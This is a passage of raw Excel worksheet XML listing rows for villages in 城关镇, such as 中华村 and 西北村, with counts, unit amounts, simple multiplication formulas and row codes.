        <v>257</v>
      </c>
      <c r="E13" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F13" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G13" s="17">
        <v>2</v>
      </c>
      <c r="H13" s="18">
        <v>325</v>
      </c>
      <c r="I13" s="17">
        <f>H13*G13</f>
        <v>650</v>
      </c>
      <c r="J13" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K13" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="1:11 16351:16362">
      <c r="A14" s="16" t="s">
        <v>259</v>
      </c>
      <c r="B14" s="17" t="str">
        <f>B13</f>
        <v>城关镇</v>
      </c>
      <c r="C14" s="17" t="str">
        <f>C13</f>
        <v>中华村</v>
      </c>
      <c r="D14" s="19" t="s">
        <v>260</v>
      </c>
      <c r="E14" s="19" t="s">
        <v>261</v>
      </c>
      <c r="F14" s="17" t="str">
        <f>F13</f>
        <v>4113210108</v>
      </c>
      <c r="G14" s="17"/>
      <c r="H14" s="17"/>
      <c r="I14" s="17"/>
      <c r="J14" s="17"/>
      <c r="K14" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="1:11 16351:16362">
      <c r="A15" s="16" t="s">
        <v>262</v>
      </c>
      <c r="B15" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D15" s="17" t="s">
        <v>264</v>
      </c>
      <c r="E15" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F15" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G15" s="17">
        <v>2</v>
      </c>
      <c r="H15" s="18">
        <v>325</v>
      </c>
      <c r="I15" s="17">
        <f>H15*G15</f>
        <v>650</v>
      </c>
      <c r="J15" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K15" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="1:11 16351:16362">
      <c r="A16" s="16" t="s">
        <v>267</v>
      </c>
      <c r="B16" s="17" t="str">
        <f>B15</f>
        <v>城关镇</v>
      </c>
      <c r="C16" s="17" t="str">
        <f>C15</f>
        <v>西北村</v>
      </c>
      <c r="D16" s="16" t="s">
        <v>268</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>269</v>
      </c>
      <c r="F16" s="17" t="str">
        <f>F15</f>
        <v>4113210106</v>
      </c>
      <c r="G16" s="17"/>
      <c r="H16" s="17"/>
      <c r="I16" s="17"/>
      <c r="J16" s="17"/>
      <c r="K16" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="1:11">
      <c r="A17" s="16" t="s">
        <v>270</v>
      </c>
      <c r="B17" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>271</v>
      </c>
      <c r="D17" s="17" t="s">
        <v>272</v>
      </c>
      <c r="E17" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F17" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G17" s="17">
        <v>2</v>
      </c>
      <c r="H17" s="18">
        <v>325</v>
      </c>
      <c r="I17" s="17">
        <f>H17*G17</f>
        <v>650</v>
      </c>
      <c r="J17" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K17" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="1:11">
      <c r="A18" s="16" t="s">
        <v>274</v>
      </c>
      <c r="B18" s="17" t="str">
        <f>B17</f>
        <v>城关镇</v>
      </c>
      <c r="C18" s="17" t="str">
        <f>C17</f>
        <v>东北五组</v>
      </c>
      <c r="D18" s="16" t="s">
        <v>275</v>
      </c>
      <c r="E18" s="16" t="s">
        <v>276</v>
      </c>
      <c r="F18" s="17" t="str">
        <f>F17</f>
        <v>4113210103</v>
      </c>
      <c r="G18" s="17"/>
      <c r="H18" s="17"/>
      <c r="I18" s="17"/>
      <c r="J18" s="17"/>
      <c r="K18" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="1:11">
      <c r="A19" s="16" t="s">
        <v>277</v>
      </c>
      <c r="B19" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C19" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D19" s="17" t="s">
        <v>278</v>
      </c>
      <c r="E19" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F19" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G19" s="17">
        <v>1</v>
      </c>
      <c r="H19" s="18">
        <v>365</v>
      </c>
      <c r="I19" s="17">
        <f t="shared" ref="I19:I25" si="0">H19*G19</f>
        <v>365</v>
      </c>
      <c r="J19" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K19" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="1:11">
      <c r="A20" s="16" t="s">
        <v>279</v>
      </c>
      <c r="B20" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D20" s="17" t="s">
        <v>280</v>
      </c>
      <c r="E20" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F20" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G20" s="17">
        <v>1</v>
      </c>
      <c r="H20" s="18">
        <v>365</v>
      </c>
      <c r="I20" s="17">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J20" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K20" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="1:11">
      <c r="A21" s="16" t="s">
        <v>282</v>
      </c>
      <c r="B21" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D21" s="17" t="s">
        <v>283</v>
      </c>
      <c r="E21" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F21" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G21" s="17">
        <v>1</v>
      </c>
      <c r="H21" s="18">
        <v>365</v>
      </c>
      <c r="I21" s="17">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J21" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K21" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="1:11">
      <c r="A22" s="16" t="s">
        <v>285</v>
      </c>
      <c r="B22" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C22" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D22" s="17" t="s">
        <v>287</v>
      </c>
      <c r="E22" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F22" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G22" s="17">
        <v>1</v>
      </c>
      <c r="H22" s="18">
        <v>365</v>
      </c>
      <c r="I22" s="17">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J22" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K22" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="1:11">
      <c r="A23" s="16" t="s">
        <v>290</v>
      </c>
      <c r="B23" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D23" s="17" t="s">
        <v>291</v>
      </c>
      <c r="E23" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G23" s="17">
        <v>1</v>
      </c>
      <c r="H23" s="18">
        <v>365</v>
      </c>
      <c r="I23" s="17">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J23" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K23" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="1:11">
      <c r="A24" s="16" t="s">
        <v>293</v>
      </c>
      <c r="B24" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D24" s="17" t="s">
        <v>294</v>
      </c>
      <c r="E24" s="17" t="s">
        <v>295</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G24" s="17">
        <v>1</v>
      </c>
      <c r="H24" s="18">
        <v>365</v>
      </c>
      <c r="I24" s="17">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J24" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K24" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="1:11">
      <c r="A25" s="16" t="s">
        <v>296</v>
      </c>
      <c r="B25" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D25" s="17" t="s">
        <v>297</v>
      </c>
      <c r="E25" s="17" t="s">
        <v>298</v>
      </c>
      <c r="F25" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G25" s="17">
        <v>2</v>
      </c>
      <c r="H25" s="18">
        <v>325</v>
      </c>
      <c r="I25" s="17">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J25" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K25" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="1:11">
      <c r="A26" s="16" t="s">
        <v>299</v>
      </c>
      <c r="B26" s="17" t="str">
        <f>B25</f>
        <v>城关镇</v>
      </c>
      <c r="C26" s="17" t="str">
        <f>C25</f>
        <v>中华村</v>
      </c>
      <c r="D26" s="16" t="s">
        <v>300</v>
      </c>
      <c r="E26" s="16" t="s">
        <v>292</v>
      </c>
      <c r="F26" s="17" t="str">
        <f>F25</f>
        <v>4113210108</v>
      </c>
      <c r="G26" s="17"/>
      <c r="H26" s="17"/>
      <c r="I26" s="17"/>
      <c r="J26" s="17"/>
      <c r="K26" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="1:11">
      <c r="A27" s="16" t="s">
        <v>301</v>
      </c>
      <c r="B27" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C27" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D27" s="17" t="s">
        <v>302</v>
      </c>
      <c r="E27" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F27" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G27" s="17">
        <v>1</v>
      </c>
      <c r="H27" s="18">
        <v>365</v>
      </c>
      <c r="I27" s="17">
        <f>H27*G27</f>
        <v>365</v>
      </c>
      <c r="J27" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K27" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="1:11">
      <c r="A28" s="16" t="s">
        <v>304</v>
      </c>
      <c r="B28" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D28" s="17" t="s">
        <v>305</v>
      </c>
      <c r="E28" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F28" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G28" s="17">
        <v>2</v>
      </c>
      <c r="H28" s="18">
        <v>325</v>
      </c>
      <c r="I28" s="17">
        <f>H28*G28</f>
        <v>650</v>
      </c>
      <c r="J28" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K28" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="1:11">
      <c r="A29" s="16" t="s">
        <v>307</v>
      </c>
      <c r="B29" s="17" t="str">
        <f>B28</f>
        <v>城关镇</v>
      </c>
      <c r="C29" s="17" t="str">
        <f>C28</f>
        <v>中华村</v>
      </c>
      <c r="D29" s="16" t="s">
        <v>308</v>
      </c>
      <c r="E29" s="16" t="s">
        <v>309</v>
      </c>
      <c r="F29" s="17" t="str">
        <f>F28</f>
        <v>4113210108</v>
      </c>
      <c r="G29" s="17"/>
      <c r="H29" s="17"/>
      <c r="I29" s="17"/>
      <c r="J29" s="17"/>
      <c r="K29" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="1:11">
      <c r="A30" s="16" t="s">
        <v>310</v>
      </c>
      <c r="B30" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C30" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D30" s="17" t="s">
        <v>311</v>
      </c>
      <c r="E30" s="17" t="s">
        <v>312</v>
      </c>
      <c r="F30" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G30" s="17">
        <v>1</v>
      </c>
      <c r="H30" s="18">
        <v>365</v>
      </c>
      <c r="I30" s="17">
        <f>H30*G30</f>
        <v>365</v>
      </c>
      <c r="J30" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K30" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="1:11">
      <c r="A31" s="16" t="s">
        <v>313</v>
      </c>
      <c r="B31" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C31" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D31" s="17" t="s">
        <v>314</v>
      </c>
      <c r="E31" s="17" t="s">
        <v>276</v>
      </c>
      <c r="F31" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G31" s="17">
        <v>1</v>
      </c>
      <c r="H31" s="18">
        <v>365</v>
      </c>
      <c r="I31" s="17">
        <f>H31*G31</f>
        <v>365</v>
      </c>
      <c r="J31" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K31" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="1:11">
      <c r="A32" s="16" t="s">
        <v>315</v>
      </c>
      <c r="B32" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C32" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D32" s="17" t="s">
        <v>316</v>
      </c>
      <c r="E32" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F32" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G32" s="17">
        <v>1</v>
      </c>
      <c r="H32" s="18">
        <v>365</v>
      </c>
      <c r="I32" s="17">
        <f>H32*G32</f>
        <v>365</v>
      </c>
      <c r="J32" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K32" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="1:11">
      <c r="A33" s="16" t="s">
        <v>317</v>
      </c>
      <c r="B33" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C33" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D33" s="17" t="s">
        <v>319</v>
      </c>
      <c r="E33" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F33" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G33" s="17">
        <v>1</v>
      </c>
      <c r="H33" s="18">
        <v>365</v>
      </c>
      <c r="I33" s="17">
        <f>H33*G33</f>
        <v>365</v>
      </c>
      <c r="J33" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K33" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="1:11">
      <c r="A34" s="16" t="s">
        <v>321</v>
      </c>
      <c r="B34" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C34" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D34" s="17" t="s">
        <v>322</v>
      </c>
      <c r="E34" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F34" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G34" s="17">
        <v>2</v>
      </c>
      <c r="H34" s="18">
        <v>325</v>
      </c>
      <c r="I34" s="17">
        <f>H34*G34</f>
        <v>650</v>
      </c>
      <c r="J34" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K34" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="1:11">
      <c r="A35" s="16" t="s">
        <v>324</v>
      </c>
      <c r="B35" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C35" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D35" s="16" t="s">
        <v>325</v>
      </c>
      <c r="E35" s="16" t="s">
        <v>326</v>
      </c>
      <c r="F35" s="17" t="str">
        <f>F34</f>
        <v>4113210106</v>
      </c>
      <c r="G35" s="17"/>
      <c r="H35" s="17"/>
      <c r="I35" s="17"/>
      <c r="J35" s="17"/>
      <c r="K35" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="1:11">
      <c r="A36" s="16" t="s">
        <v>327</v>
      </c>
      <c r="B36" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C36" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D36" s="17" t="s">
        <v>328</v>
      </c>
      <c r="E36" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F36" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G36" s="17">
        <v>1</v>
      </c>
      <c r="H36" s="18">
        <v>365</v>
      </c>
      <c r="I36" s="17">
        <f>H36*G36</f>
        <v>365</v>
      </c>
      <c r="J36" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K36" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="1:11">
      <c r="A37" s="16" t="s">
        <v>329</v>
      </c>
      <c r="B37" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C37" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D37" s="17" t="s">
        <v>330</v>
      </c>
      <c r="E37" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F37" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G37" s="17">
        <v>2</v>
      </c>
      <c r="H37" s="18">
        <v>325</v>
      </c>
      <c r="I37" s="17">
        <f>H37*G37</f>
        <v>650</v>
      </c>
      <c r="J37" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K37" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="1:11">
      <c r="A38" s="16" t="s">
        <v>332</v>
      </c>
      <c r="B38" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C38" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D38" s="16" t="s">
        <v>333</v>
      </c>
      <c r="E38" s="16" t="s">
        <v>334</v>
      </c>
      <c r="F38" s="17" t="str">
        <f>F37</f>
        <v>4113210106</v>
      </c>
      <c r="G38" s="17"/>
      <c r="H38" s="17"/>
      <c r="I38" s="17"/>
      <c r="J38" s="17"/>
      <c r="K38" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="1:11">
      <c r="A39" s="16" t="s">
        <v>335</v>
      </c>
      <c r="B39" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C39" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D39" s="17" t="s">
        <v>336</v>
      </c>
      <c r="E39" s="17" t="s">
        <v>337</v>
      </c>
      <c r="F39" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G39" s="17">
        <v>3</v>
      </c>
      <c r="H39" s="18">
        <v>290</v>
      </c>
      <c r="I39" s="17">
        <f>H39*G39</f>
        <v>870</v>
      </c>
      <c r="J39" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K39" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="1:11">
      <c r="A40" s="16" t="s">
        <v>338</v>
      </c>
      <c r="B40" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C40" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D40" s="16" t="s">
        <v>339</v>
      </c>
      <c r="E40" s="16" t="s">
        <v>340</v>
      </c>
      <c r="F40" s="17" t="str">
        <f>F39</f>
        <v>4113210103</v>
      </c>
      <c r="G40" s="17"/>
      <c r="H40" s="17"/>
      <c r="I40" s="17"/>
      <c r="J40" s="17"/>
      <c r="K40" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="41" customHeight="1" spans="1:11">
      <c r="A41" s="16" t="s">
        <v>341</v>
      </c>
      <c r="B41" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C41" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D41" s="16" t="s">
        <v>342</v>
      </c>
      <c r="E41" s="16" t="s">
        <v>343</v>
      </c>
      <c r="F41" s="17" t="str">
        <f>F40</f>
        <v>4113210103</v>
      </c>
      <c r="G41" s="17"/>
      <c r="H41" s="17"/>
      <c r="I41" s="17"/>
      <c r="J41" s="17"/>
      <c r="K41" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="1:11">
      <c r="A42" s="16" t="s">
        <v>344</v>
      </c>
      <c r="B42" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C42" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D42" s="17" t="s">
        <v>345</v>
      </c>
      <c r="E42" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F42" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G42" s="17">
        <v>2</v>
      </c>
      <c r="H42" s="18">
        <v>325</v>
      </c>
      <c r="I42" s="17">
        <f>H42*G42</f>
        <v>650</v>
      </c>
      <c r="J42" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K42" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="1:11">
      <c r="A43" s="16" t="s">
        <v>347</v>
      </c>
      <c r="B43" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C43" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D43" s="16" t="s">
        <v>348</v>
      </c>
      <c r="E43" s="16" t="s">
        <v>349</v>
      </c>
      <c r="F43" s="17" t="str">
        <f>F42</f>
        <v>4113210108</v>
      </c>
      <c r="G43" s="17"/>
      <c r="H43" s="17"/>
      <c r="I43" s="17"/>
      <c r="J43" s="17"/>
      <c r="K43" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="1:11">
      <c r="A44" s="16" t="s">
        <v>350</v>
      </c>
      <c r="B44" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C44" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D44" s="17" t="s">
        <v>351</v>
      </c>
      <c r="E44" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F44" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G44" s="17">
        <v>1</v>
      </c>
      <c r="H44" s="18">
        <v>365</v>
      </c>
      <c r="I44" s="17">
        <f>H44*G44</f>
        <v>365</v>
      </c>
      <c r="J44" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K44" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="1:11">
      <c r="A45" s="16" t="s">
        <v>352</v>
      </c>
      <c r="B45" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C45" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D45" s="17" t="s">
        <v>353</v>
      </c>
      <c r="E45" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F45" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G45" s="17">
        <v>1</v>
      </c>
      <c r="H45" s="18">
        <v>365</v>
      </c>
      <c r="I45" s="17">
        <f>H45*G45</f>
        <v>365</v>
      </c>
      <c r="J45" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K45" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="1:11">
      <c r="A46" s="16" t="s">
        <v>354</v>
      </c>
      <c r="B46" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C46" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D46" s="17" t="s">
        <v>355</v>
      </c>
      <c r="E46" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F46" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G46" s="17">
        <v>1</v>
      </c>
      <c r="H46" s="18">
        <v>365</v>
      </c>
      <c r="I46" s="17">
        <f>H46*G46</f>
        <v>365</v>
      </c>
      <c r="J46" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K46" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="1:11">
      <c r="A47" s="16" t="s">
        <v>356</v>
      </c>
      <c r="B47" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C47" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D47" s="17" t="s">
        <v>357</v>
      </c>
      <c r="E47" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F47" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G47" s="17">
        <v>2</v>
      </c>
      <c r="H47" s="18">
        <v>325</v>
      </c>
      <c r="I47" s="17">
        <f>H47*G47</f>
        <v>650</v>
      </c>
      <c r="J47" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K47" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="1:11">
      <c r="A48" s="16" t="s">
        <v>358</v>
      </c>
      <c r="B48" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C48" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D48" s="16" t="s">
        <v>359</v>
      </c>
      <c r="E48" s="16" t="s">
        <v>360</v>
      </c>
      <c r="F48" s="17" t="str">
        <f>F47</f>
        <v>4113210102</v>
      </c>
      <c r="G48" s="17"/>
      <c r="H48" s="17"/>
      <c r="I48" s="17"/>
      <c r="J48" s="17"/>
      <c r="K48" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="1:11">
      <c r="A49" s="16" t="s">
        <v>361</v>
      </c>
      <c r="B49" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C49" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D49" s="17" t="s">
        <v>362</v>
      </c>
      <c r="E49" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F49" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G49" s="17">
        <v>2</v>
      </c>
      <c r="H49" s="18">
        <v>325</v>
      </c>
      <c r="I49" s="17">
        <f>H49*G49</f>
        <v>650</v>
      </c>
      <c r="J49" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K49" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="1:11">
      <c r="A50" s="16" t="s">
        <v>363</v>
      </c>
      <c r="B50" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C50" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D50" s="16" t="s">
        <v>364</v>
      </c>
      <c r="E50" s="16" t="s">
        <v>236</v>
      </c>
      <c r="F50" s="17" t="str">
        <f>F49</f>
        <v>4113210106</v>
      </c>
      <c r="G50" s="17"/>
      <c r="H50" s="17"/>
      <c r="I50" s="17"/>
      <c r="J50" s="17"/>
      <c r="K50" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="51" customHeight="1" spans="1:11">
      <c r="A51" s="16" t="s">
        <v>365</v>
      </c>
      <c r="B51" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C51" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D51" s="17" t="s">
        <v>366</v>
      </c>
      <c r="E51" s="17" t="s">
        <v>367</v>
      </c>
      <c r="F51" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G51" s="17">
        <v>2</v>
      </c>
      <c r="H51" s="18">
        <v>325</v>
      </c>
      <c r="I51" s="17">
        <f>H51*G51</f>
        <v>650</v>
      </c>
      <c r="J51" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K51" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="52" customHeight="1" spans="1:11">
      <c r="A52" s="16" t="s">
        <v>368</v>
      </c>
      <c r="B52" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C52" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D52" s="16" t="s">
        <v>369</v>
      </c>
      <c r="E52" s="16" t="s">
        <v>370</v>
      </c>
      <c r="F52" s="17" t="str">
        <f>F51</f>
        <v>4113210103</v>
      </c>
      <c r="G52" s="17"/>
      <c r="H52" s="17"/>
      <c r="I52" s="17"/>
      <c r="J52" s="17"/>
      <c r="K52" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="1:11">
      <c r="A53" s="16" t="s">
        <v>371</v>
      </c>
      <c r="B53" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C53" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D53" s="17" t="s">
        <v>372</v>
      </c>
      <c r="E53" s="17" t="s">
        <v>312</v>
      </c>
      <c r="F53" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G53" s="17">
        <v>2</v>
      </c>
      <c r="H53" s="18">
        <v>325</v>
      </c>
      <c r="I53" s="17">
        <f>H53*G53</f>
        <v>650</v>
      </c>
      <c r="J53" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K53" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="1:11">
      <c r="A54" s="16" t="s">
        <v>373</v>
      </c>
      <c r="B54" s="17" t="str">
        <f>B53</f>
        <v>城关镇</v>
      </c>
      <c r="C54" s="17" t="str">
        <f>C53</f>
        <v>西北村</v>
      </c>
      <c r="D54" s="16" t="s">
        <v>374</v>
      </c>
      <c r="E54" s="16" t="s">
        <v>288</v>
      </c>
      <c r="F54" s="17" t="str">
        <f>F53</f>
        <v>4113210106</v>
      </c>
      <c r="G54" s="17"/>
      <c r="H54" s="17"/>
      <c r="I54" s="17"/>
      <c r="J54" s="17"/>
      <c r="K54" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="1:11">
      <c r="A55" s="16" t="s">
        <v>375</v>
      </c>
      <c r="B55" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C55" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D55" s="17" t="s">
        <v>376</v>
      </c>
      <c r="E55" s="17" t="s">
